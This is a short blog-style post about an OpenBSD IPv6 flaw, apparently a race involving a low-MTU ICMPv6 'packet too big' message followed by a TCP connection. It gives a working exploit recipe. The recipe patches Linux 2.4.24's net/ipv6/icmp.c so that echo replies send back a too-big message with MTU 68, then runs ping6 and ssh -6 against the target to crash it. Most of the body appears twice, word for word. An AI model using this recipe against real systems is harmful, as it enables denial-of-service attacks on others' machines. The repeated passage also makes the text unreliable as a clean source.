Tweet
Don't see these very often (although it's certainly happened more than once, contrary to their claims) and only applies to OpenBSD systems on IPv6 networks, but still, interesting.
I'm not 100% clear on the details, but it appears to be some sort of race condition involving receiving a low-MTU ICMP datagram then initiating a TCP/IPv6 connection.
To exploit this vulnerability, you will need a Linux system. Edit Linux 2.4.24's net/ipv6/icmp.c and change the following:
case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro
Recompile. Reboot.
then:
ping6 openbsd
ssh -6 openbsd
The vulnerability discoverer's writeup is a little bit less than scholarly: http://www.guninski.com/obsdmtu.html
I'm not 100% clear on the details, but it appears to be some sort of race condition involving receiving a low-MTU ICMP datagram then initiating a TCP/IPv6 connection.
To exploit this vulnerability, you will need a Linux system. Edit Linux 2.4.24's net/ipv6/icmp.c and change the following:
case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro
Recompile. Reboot.
then:
ping6 openbsd
ssh -6 openbsd
The vulnerability discoverer's writeup is a little bit less than scholarly: http://www.guninski.com/obsdmtu.html